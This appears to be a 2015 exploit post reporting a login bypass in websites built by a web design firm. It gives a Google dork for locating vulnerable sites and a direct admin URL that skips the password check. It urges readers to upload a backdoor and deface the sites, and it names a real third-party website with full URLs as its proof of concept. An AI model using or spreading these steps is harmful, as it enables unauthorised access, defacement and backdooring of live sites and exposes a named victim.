I am posting my exploit Linux Optic Web Design and development- Login Bypass which has got CVS (Critical Vulnerability Scaling) of 8.1 out of 10.
# Exploit Title: Direct login to admin panel without entering password # Google Dork: Design by www.linuxoptic.com 2009 # Date: 2015-07-10 # Exploit Author: Aaditya Purani # Vendor Homepage: www.linuxoptic.com # Software Link: No software link # Version: 2009 Web admin login panel # Tested on: Kali Linux/ Windows 7 # CVE : Critical Vulnerability Hello, This is Aaditya purani and i have found a critical bug in websites which has been designed by Linuxoptic. First type the dork "Design by www.linuxoptic.com 2009" in google without Double quotes("). Then after find the site in which their is written Design by www.linuxoptic.com 2009 in the footer Now, go to it's admin page http://www.targetsite.com/adminpanel After opening the admin panel . Follow this link http://www.targetsite.com/adminpanel/home.php And voila you will be directly login into the admin panel and you can also upload your backdoor and deface. #POC: Site: http://www.carrefamily.com/ It's admin panel : http://www.carrefamily.com/adminpanel Directly login to admin panel : http://www.carrefamily.com/adminpanel/home.php Thank you